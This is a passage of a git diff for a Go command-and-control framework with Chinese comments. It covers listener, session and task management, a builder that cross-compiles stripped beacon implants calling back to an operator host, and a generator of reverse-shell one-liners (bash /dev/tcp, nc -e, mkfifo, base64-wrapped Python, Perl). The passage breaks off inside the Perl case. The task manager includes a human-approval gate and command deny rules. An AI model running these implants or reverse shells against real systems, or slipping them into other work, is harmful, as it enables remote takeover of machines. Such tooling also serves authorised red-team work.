+ if err != nil { + return nil, fmt.Errorf("marshal listener config: %w", err) + } + keyB64, err := GenerateAESKey() + if err != nil { + return nil, fmt.Errorf("generate key: %w", err) + } + tokenB64, err := GenerateImplantToken() + if err != nil { + return nil, fmt.Errorf("generate token: %w", err) + } + + listener := &database.C2Listener{ + ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14], + Name: strings.TrimSpace(in.Name), + Type: strings.ToLower(strings.TrimSpace(in.Type)), + BindHost: bindHost, + BindPort: in.BindPort, + ProfileID: strings.TrimSpace(in.ProfileID), + EncryptionKey: keyB64, + ImplantToken: tokenB64, + Status: "stopped", + ConfigJSON: string(cfgJSON), + Remark: strings.TrimSpace(in.Remark), + CreatedAt: time.Now(), + } + if err := m.db.CreateC2Listener(listener); err != nil { + return nil, err + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{ + "listener_id": listener.ID, + "type": listener.Type, + }) + return listener, nil +} + +// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning) +func (m *Manager) StartListener(id string) (*database.C2Listener, error) { + rec, err := m.db.GetC2Listener(id) + if err != nil { + return nil, err + } + if rec == nil { + return nil, ErrListenerNotFound + } + m.mu.Lock() + if _, ok := m.runningListeners[id]; ok { + m.mu.Unlock() + return rec, ErrListenerRunning + } + m.mu.Unlock() + + cfg := &ListenerConfig{} + if rec.ConfigJSON != "" { + _ = json.Unmarshal([]byte(rec.ConfigJSON), cfg) + } + cfg.ApplyDefaults() + + // 通过工厂创建具体实现 + factory := m.registry.Get(rec.Type) + if factory == nil { + return nil, ErrUnsupportedType + } + inst, err := factory(ListenerCreationCtx{ + Listener: rec, + Config: cfg, + Manager: m, + Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)), + }) + if err != nil { + return nil, err + } + if err := inst.Start(); err != nil { + now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now) + m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{ + "listener_id": rec.ID, + }) + return nil, err + } + m.mu.Lock() + m.runningListeners[rec.ID] = inst + m.mu.Unlock() + now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now) + rec.Status = "running" + rec.StartedAt = &now + rec.LastError = "" + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{ + "listener_id": rec.ID, + "bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort), + }) + return rec, nil +} + +// StopListener 停止;幂等(未运行时返回 ErrListenerStopped) +func (m *Manager) StopListener(id string) error { + m.mu.Lock() + inst, ok := m.runningListeners[id] + if ok { + delete(m.runningListeners, id) + } + m.mu.Unlock() + if !ok { + return ErrListenerStopped + } + if err := inst.Stop(); err != nil { + return err + } + _ = m.db.SetC2ListenerStatus(id, "stopped", "", nil) + rec, _ := m.db.GetC2Listener(id) + name := id + if rec != nil { + name = rec.Name + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{ + "listener_id": id, + }) + return nil +} + +// DeleteListener 停止并删除(级联 sessions/tasks/files) +func (m *Manager) DeleteListener(id string) error { + _ = m.StopListener(id) + return m.db.DeleteC2Listener(id) +} + +// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时) +func (m *Manager) IsListenerRunning(id string) bool { + m.mu.RLock() + defer m.mu.RUnlock() + _, ok := m.runningListeners[id] + return ok +} + +// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起; +// 失败的会被改为 status=error,不会阻塞整个 App 启动。 +func (m *Manager) RestoreRunningListeners() { + listeners, err := m.db.ListC2Listeners() + if err != nil { + m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err)) + return + } + for _, l := range listeners { + if l.Status != "running" { + continue + } + if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) { + m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err)) + } + } +} + +// ---------------------------------------------------------------------------- +// Session 生命周期 +// ---------------------------------------------------------------------------- + +// IngestCheckIn beacon 上线/心跳的统一入口。 +// 行为: +// 1. 若 implant_uuid 已有会话 → 更新心跳/状态 +// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子 +func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) { + if strings.TrimSpace(req.ImplantUUID) == "" { + return nil, ErrInvalidInput + } + existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID) + if err != nil { + return nil, err + } + now := time.Now() + isFirstSeen := existing == nil + var sessID string + if existing != nil { + sessID = existing.ID + } else { + sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + } + session := &database.C2Session{ + ID: sessID, + ListenerID: listenerID, + ImplantUUID: req.ImplantUUID, + Hostname: req.Hostname, + Username: req.Username, + OS: strings.ToLower(req.OS), + Arch: strings.ToLower(req.Arch), + PID: req.PID, + ProcessName: req.ProcessName, + IsAdmin: req.IsAdmin, + InternalIP: req.InternalIP, + UserAgent: req.UserAgent, + SleepSeconds: req.SleepSeconds, + JitterPercent: req.JitterPercent, + Status: string(SessionActive), + FirstSeenAt: now, + LastCheckIn: now, + Metadata: req.Metadata, + } + if existing != nil { + // 保留原 ID/FirstSeenAt/Note,避免被覆盖 + session.FirstSeenAt = existing.FirstSeenAt + if session.Note == "" { + session.Note = existing.Note + } + } + if err := m.db.UpsertC2Session(session); err != nil { + return nil, err + } + if isFirstSeen { + m.publishEvent("critical", "session", session.ID, "", + fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch), + map[string]interface{}{ + "session_id": session.ID, + "listener_id": listenerID, + "hostname": session.Hostname, + "os": session.OS, + "arch": session.Arch, + "internal_ip": session.InternalIP, + }) + m.mu.RLock() + hook := m.hooks.OnSessionFirstSeen + m.mu.RUnlock() + if hook != nil { + go hook(session) + } + } + // 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。 + // 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。 + return session, nil +} + +// MarkSessionDead 心跳超时检测器调用:标记会话为 dead +func (m *Manager) MarkSessionDead(sessionID string) error { + if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil { + return err + } + m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil) + return nil +} + +// ---------------------------------------------------------------------------- +// Task 生命周期 +// ---------------------------------------------------------------------------- + +// EnqueueTaskInput 下发任务入参 +type EnqueueTaskInput struct { + SessionID string + TaskType TaskType + Payload map[string]interface{} + Source string // manual|ai|batch|api + ConversationID string + UserCtx context.Context // 给 HITL 用 + BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用) +} + +// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。 +// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。 +func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) { + if strings.TrimSpace(in.SessionID) == "" { + return nil, ErrInvalidInput + } + session, err := m.db.GetC2Session(in.SessionID) + if err != nil { + return nil, err + } + if session == nil { + return nil, ErrSessionNotFound + } + if session.Status == string(SessionDead) || session.Status == string(SessionKilled) { + return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409} + } + + // OPSEC: command deny regex enforcement + if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell { + cmd, _ := in.Payload["command"].(string) + if cmd != "" { + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil { + for _, pattern := range listenerCfg.CommandDenyRegex { + re, err := regexp.Compile(pattern) + if err != nil { + m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err)) + continue + } + if re.MatchString(cmd) { + return nil, &CommonError{ + Code: "command_denied", + Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern), + HTTP: 403, + } + } + } + } + } + } + + // OPSEC: max_concurrent_tasks enforcement + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 { + activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskQueued), + }) + sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskSent), + }) + concurrent := len(activeTasks) + len(sentTasks) + if concurrent >= listenerCfg.MaxConcurrentTasks { + return nil, &CommonError{ + Code: "concurrent_limit", + Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks), + HTTP: 429, + } + } + } + + taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + task := &database.C2Task{ + ID: taskID, + SessionID: in.SessionID, + TaskType: string(in.TaskType), + Payload: in.Payload, + Status: string(TaskQueued), + Source: strOr(in.Source, "manual"), + ConversationID: in.ConversationID, + CreatedAt: time.Now(), + } + + // HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。 + if IsDangerousTaskType(in.TaskType) && !in.BypassHITL { + m.mu.RLock() + bridge := m.hitlBridge + gate := m.hitlDangerousGate + m.mu.RUnlock() + convID := strings.TrimSpace(in.ConversationID) + useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task) + if useBridge { + task.ApprovalStatus = "pending" + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + }) + payloadBytes, _ := json.Marshal(in.Payload) + ctx := HITLUserContext(in.UserCtx) + if ctx == nil { + ctx = context.Background() + } + go func() { + err := bridge.RequestApproval(ctx, HITLApprovalRequest{ + TaskID: taskID, + SessionID: in.SessionID, + TaskType: string(in.TaskType), + PayloadJSON: string(payloadBytes), + ConversationID: in.ConversationID, + Source: task.Source, + Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType), + }) + if err != nil { + rejected := "rejected" + failed := string(TaskFailed) + errMsg := "HITL 拒绝: " + err.Error() + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ + ApprovalStatus: &rejected, + Status: &failed, + Error: &errMsg, + }) + m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil) + return + } + approved := "approved" + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved}) + m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil) + }() + return task, nil + } + // 未接桥或会话未开启人机协同 / 工具在白名单:直接入队 + task.ApprovalStatus = "approved" + } + + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + "source": task.Source, + }) + return task, nil +} + +// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚) +func (m *Manager) CancelTask(taskID string) error { + t, err := m.db.GetC2Task(taskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + if t.Status != string(TaskQueued) && t.Status != string(TaskSent) { + return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409} + } + cancelled := string(TaskCancelled) + now := time.Now() + if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil { + return err + } + m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil) + return nil +} + +// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务, +// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。 +func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) { + tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit) + if err != nil { + return nil, err + } + out := make([]TaskEnvelope, 0, len(tasks)) + for _, t := range tasks { + out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload}) + } + return out, nil +} + +// IngestTaskResult beacon 回传任务结果的统一入口 +func (m *Manager) IngestTaskResult(report TaskResultReport) error { + if strings.TrimSpace(report.TaskID) == "" { + return ErrInvalidInput + } + t, err := m.db.GetC2Task(report.TaskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + + startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond)) + endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond)) + if report.StartedAt == 0 { + startedAt = time.Now() + } + if report.EndedAt == 0 { + endedAt = time.Now() + } + + status := string(TaskSuccess) + if !report.Success { + status = string(TaskFailed) + } + duration := endedAt.Sub(startedAt).Milliseconds() + upd := database.C2TaskUpdate{ + Status: &status, + ResultText: &report.Output, + Error: &report.Error, + StartedAt: &startedAt, + CompletedAt: &endedAt, + DurationMS: &duration, + } + + // blob(如截图)落盘 + if len(report.BlobBase64) > 0 { + blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix) + if err == nil { + upd.ResultBlobPath = &blobPath + } else { + m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID)) + } + } + + if err := m.db.UpdateC2Task(t.ID, upd); err != nil { + return err + } + t.Status = status + t.ResultText = report.Output + t.Error = report.Error + + level := "info" + msg := fmt.Sprintf("任务完成: %s", t.TaskType) + if !report.Success { + level = "warn" + msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error) + } + m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{ + "task_id": t.ID, + "task_type": t.TaskType, + "duration": duration, + }) + + m.mu.RLock() + hook := m.hooks.OnTaskCompleted + m.mu.RUnlock() + if hook != nil { + go hook(t, t.SessionID) + } + return nil +} + +func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) { + suffix = strings.TrimSpace(suffix) + if suffix == "" { + suffix = ".bin" + } + if !strings.HasPrefix(suffix, ".") { + suffix = "." + suffix + } + dir := filepath.Join(m.storageDir, "results") + if err := osMkdirAll(dir, 0o755); err != nil { + return "", err + } + path := filepath.Join(dir, taskID+suffix) + data, err := base64Decode(b64Content) + if err != nil { + return "", err + } + if err := osWriteFile(path, data, 0o644); err != nil { + return "", err + } + return path, nil +} + +// ---------------------------------------------------------------------------- +// 事件总线辅助 +// ---------------------------------------------------------------------------- + +// publishEvent 同步写 c2_events 表 + 投放到内存事件总线 +func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + now := time.Now() + e := &database.C2Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + } + if err := m.db.AppendC2Event(e); err != nil { + m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category)) + } + m.bus.Publish(&Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + }) +} + +// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用 +func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + m.publishEvent(level, category, sessionID, taskID, message, data) +} + +// ---------------------------------------------------------------------------- +// 工具函数 +// ---------------------------------------------------------------------------- + +func strOr(s, def string) string { + if strings.TrimSpace(s) == "" { + return def + } + return s +} + +// getListenerConfig loads and parses the listener's config JSON from DB. +func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig { + listener, err := m.db.GetC2Listener(listenerID) + if err != nil || listener == nil { + return nil + } + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" { + _ = json.Unmarshal([]byte(listener.ConfigJSON), cfg) + } + return cfg +} + +// GetProfile loads a C2Profile from DB by ID. +func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) { + if strings.TrimSpace(profileID) == "" { + return nil, nil + } + return m.db.GetC2Profile(profileID) +} diff --git a/internal/c2/payload_builder.go b/internal/c2/payload_builder.go new file mode 100644 index 00000000..933a97d6 --- /dev/null +++ b/internal/c2/payload_builder.go @@ -0,0 +1,308 @@ +package c2 + +import ( + "encoding/json" + "fmt" + "net" + "os" + "strconv" + "os/exec" + "path/filepath" + "strings" + "text/template" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// PayloadBuilderInput 构建 beacon 的输入参数 +type PayloadBuilderInput struct { + ListenerID string // l_xxx + OS string // linux|windows|darwin + Arch string // amd64|arm64|386 + SleepSeconds int + JitterPercent int + OutputName string // custom output filename (without extension); defaults to "beacon__" + // Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测) + Host string +} + +// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制 +type PayloadBuilder struct { + manager *Manager + logger *zap.Logger + tmplDir string // 模板目录,如 internal/c2/payload_templates + outputDir string // 输出目录,如 tmp/c2/payloads +} + +// NewPayloadBuilder 创建构建器 +func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder { + if tmplDir == "" { + tmplDir = "internal/c2/payload_templates" + } + if outputDir == "" { + outputDir = "tmp/c2/payloads" + } + return &PayloadBuilder{ + manager: manager, + logger: logger, + tmplDir: tmplDir, + outputDir: outputDir, + } +} + +// BuildResult 构建结果 +type BuildResult struct { + PayloadID string `json:"payload_id"` + ListenerID string `json:"listener_id"` + OutputPath string `json:"output_path"` + DownloadPath string `json:"download_path"` // 磁盘上的绝对路径 + OS string `json:"os"` + Arch string `json:"arch"` + SizeBytes int64 `json:"size_bytes"` +} + +// BuildBeacon 交叉编译生成 beacon 二进制 +func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) { + listener, err := b.manager.DB().GetC2Listener(in.ListenerID) + if err != nil { + return nil, fmt.Errorf("get listener: %w", err) + } + if listener == nil { + return nil, ErrListenerNotFound + } + + lt := strings.ToLower(listener.Type) + + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + cfg.ApplyDefaults() + + // 确定目标架构 + goos := strings.ToLower(in.OS) + goarch := strings.ToLower(in.Arch) + if goos == "" { + goos = "linux" + } + if goarch == "" { + goarch = "amd64" + } + + // 读取模板 + tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl") + tmplData, err := os.ReadFile(tmplPath) + if err != nil { + return nil, fmt.Errorf("read template: %w", err) + } + + // 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost) + host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID) + serverURL := fmt.Sprintf("%s://%s:%d", + listenerTypeToScheme(listener.Type), + host, + listener.BindPort, + ) + + transport := "http" + tcpDialAddr := "" + transportMeta := "http_beacon" + switch lt { + case "tcp_reverse": + transport = "tcp" + tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort)) + transportMeta = "tcp_beacon" + case "https_beacon": + transportMeta = "https_beacon" + case "websocket": + transportMeta = "websocket" + } + + data := map[string]string{ + "Transport": transport, + "TCPDialAddr": tcpDialAddr, + "TransportMetadata": transportMeta, + "ServerURL": serverURL, + "ImplantToken": listener.ImplantToken, + "AESKeyB64": listener.EncryptionKey, + "SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)), + "JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)), + "CheckInPath": cfg.BeaconCheckInPath, + "TasksPath": cfg.BeaconTasksPath, + "ResultPath": cfg.BeaconResultPath, + "UploadPath": cfg.BeaconUploadPath, + "FilePath": cfg.BeaconFilePath, + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + } + + // 执行模板 + tmpl, err := template.New("beacon").Parse(string(tmplData)) + if err != nil { + return nil, fmt.Errorf("parse template: %w", err) + } + + // 创建工作目录 + workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8]) + if err := os.MkdirAll(workDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir: %w", err) + } + defer os.RemoveAll(workDir) // 清理 + + srcPath := filepath.Join(workDir, "main.go") + f, err := os.Create(srcPath) + if err != nil { + return nil, fmt.Errorf("create source: %w", err) + } + if err := tmpl.Execute(f, data); err != nil { + f.Close() + return nil, fmt.Errorf("execute template: %w", err) + } + f.Close() + + // 交叉编译 + binName := strings.TrimSpace(in.OutputName) + if binName == "" { + binName = fmt.Sprintf("beacon_%s_%s", goos, goarch) + } + if goos == "windows" && !strings.HasSuffix(binName, ".exe") { + binName += ".exe" + } + binPath := filepath.Join(b.outputDir, binName) + + if err := os.MkdirAll(b.outputDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir output: %w", err) + } + + absSrcPath, err := filepath.Abs(srcPath) + if err != nil { + return nil, fmt.Errorf("abs source path: %w", err) + } + absBinPath, err := filepath.Abs(binPath) + if err != nil { + return nil, fmt.Errorf("abs output path: %w", err) + } + cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath) + cmd.Env = append(os.Environ(), + "GOOS="+goos, + "GOARCH="+goarch, + "CGO_ENABLED=0", + ) + cmd.Dir = workDir + output, err := cmd.CombinedOutput() + if err != nil { + b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err)) + return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output)) + } + + // 获取文件大小 + info, err := os.Stat(binPath) + if err != nil { + return nil, fmt.Errorf("stat output: %w", err) + } + + payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + return &BuildResult{ + PayloadID: payloadID, + ListenerID: listener.ID, + OutputPath: absBinPath, + DownloadPath: absBinPath, + OS: goos, + Arch: goarch, + SizeBytes: info.Size(), + }, nil +} + +func listenerTypeToScheme(t string) string { + switch strings.ToLower(t) { + case "https_beacon": + return "https" + case "websocket": + return "ws" + case "http_beacon": + return "http" + default: + return "http" + } +} + +func firstPositive(vals ...int) int { + for _, v := range vals { + if v > 0 { + return v + } + } + return 1 +} + +func clamp(v, min, max int) int { + if v < min { + return min + } + if v > max { + return max + } + return v +} + +// GetPayloadStoragePath 返回 payload 存储目录的绝对路径 +func (b *PayloadBuilder) GetPayloadStoragePath() string { + abs, _ := filepath.Abs(b.outputDir) + return abs +} + +// GetSupportedOSArch 返回支持的操作系统和架构列表 +func GetSupportedOSArch() map[string][]string { + return map[string][]string{ + "linux": {"amd64", "arm64", "386", "arm"}, + "windows": {"amd64", "arm64", "386"}, + "darwin": {"amd64", "arm64"}, + } +} + +// ValidateOSArch 验证 OS/Arch 组合是否可编译 +func ValidateOSArch(os, arch string) bool { + supported := GetSupportedOSArch() + arches, ok := supported[strings.ToLower(os)] + if !ok { + return false + } + for _, a := range arches { + if a == strings.ToLower(arch) { + return true + } + } + return false +} + +// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found. +func detectExternalIP() string { + ifaces, err := net.Interfaces() + if err != nil { + return "" + } + for _, iface := range ifaces { + if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 { + continue + } + addrs, err := iface.Addrs() + if err != nil { + continue + } + for _, addr := range addrs { + ipnet, ok := addr.(*net.IPNet) + if !ok || ipnet.IP.To4() == nil { + continue + } + return ipnet.IP.String() + } + } + return "" +} + +func parseJSON(s string, v interface{}) error { + if strings.TrimSpace(s) == "" || s == "{}" { + return nil + } + return json.Unmarshal([]byte(s), v) +} diff --git a/internal/c2/payload_encoding.go b/internal/c2/payload_encoding.go new file mode 100644 index 00000000..0ab70600 --- /dev/null +++ b/internal/c2/payload_encoding.go @@ -0,0 +1,25 @@ +package c2 + +import ( + "encoding/base64" + "encoding/binary" +) + +// b64StdEncode 用标准 base64 编码字节 +func b64StdEncode(s string) string { + return base64.StdEncoding.EncodeToString([]byte(s)) +} + +// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand +// (Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误) +func utf16LEBase64(s string) string { + runes := []rune(s) + buf := make([]byte, 0, len(runes)*2) + for _, r := range runes { + // 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内 + var enc [2]byte + binary.LittleEndian.PutUint16(enc[:], uint16(r)) + buf = append(buf, enc[:]...) + } + return base64.StdEncoding.EncodeToString(buf) +} diff --git a/internal/c2/payload_oneliner.go b/internal/c2/payload_oneliner.go new file mode 100644 index 00000000..0945b95a --- /dev/null +++ b/internal/c2/payload_oneliner.go @@ -0,0 +1,190 @@ +package c2 + +import ( + "fmt" + "net/url" + "strings" +) + +// OnelinerKind 单行 payload 的语言/形式 +type OnelinerKind string + +const ( + OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener) + OnelinerNc OnelinerKind = "nc" // netcat 反弹 + OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e) + OnelinerPython OnelinerKind = "python" // python socket 反弹 + OnelinerPerl OnelinerKind = "perl" // perl 反弹 + OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格) + OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制) +) + +// AllOnelinerKinds 所有支持的 oneliner 类型 +func AllOnelinerKinds() []OnelinerKind { + return []OnelinerKind{ + OnelinerBash, OnelinerNc, OnelinerNcMkfifo, + OnelinerPython, OnelinerPerl, + OnelinerPowerShell, OnelinerCurl, + } +} + +// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型 +var tcpOnelinerKinds = map[OnelinerKind]bool{ + OnelinerBash: true, + OnelinerNc: true, + OnelinerNcMkfifo: true, + OnelinerPython: true, + OnelinerPerl: true, + OnelinerPowerShell: true, +} + +// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型 +var httpOnelinerKinds = map[OnelinerKind]bool{ + OnelinerCurl: true, +} + +// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表 +func OnelinerKindsForListener(listenerType string) []OnelinerKind { + switch ListenerType(listenerType) { + case ListenerTypeTCPReverse: + return []OnelinerKind{ + OnelinerBash, OnelinerNc, OnelinerNcMkfifo, + OnelinerPython, OnelinerPerl, OnelinerPowerShell, + } + case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket: + return []OnelinerKind{OnelinerCurl} + default: + return nil + } +} + +// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容 +func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool { + switch ListenerType(listenerType) { + case ListenerTypeTCPReverse: + return tcpOnelinerKinds[kind] + case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket: + return httpOnelinerKinds[kind] + default: + return false + } +} + +// OnelinerInput 生成 oneliner 的入参 +type OnelinerInput struct { + Kind OnelinerKind + Host string // 攻击机回连地址(IP/域名) + Port int // 监听端口 + HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com + ImplantToken string // HTTP Beacon 鉴权 token +} + +// GenerateOneliner 生成单行 payload。 +// 设计要点: +// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等); +// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误; +// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。 +func GenerateOneliner(in OnelinerInput) (string, error) { + host := strings.TrimSpace(in.Host) + if host == "" { + return "", fmt.Errorf("host is required") + } + switch in.Kind { + case OnelinerBash: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行 + // /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释 + return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil + + case OnelinerNc: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil + + case OnelinerNcMkfifo: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用 + return fmt.Sprintf( + `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`, + host, in.Port, + ), nil + + case OnelinerPython: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec + py := fmt.Sprintf( + `import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`, + host, in.Port, + ) + // 用 b64 包装规避目标 shell 引号问题 + return fmt.Sprintf( + `python3 -c "import base64,sys;exec(base64.b64decode('%s').decode())"`, + b64StdEncode(py), + ), nil + + case OnelinerPerl: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + return fmt.Sprintf( + `perl -e 'use 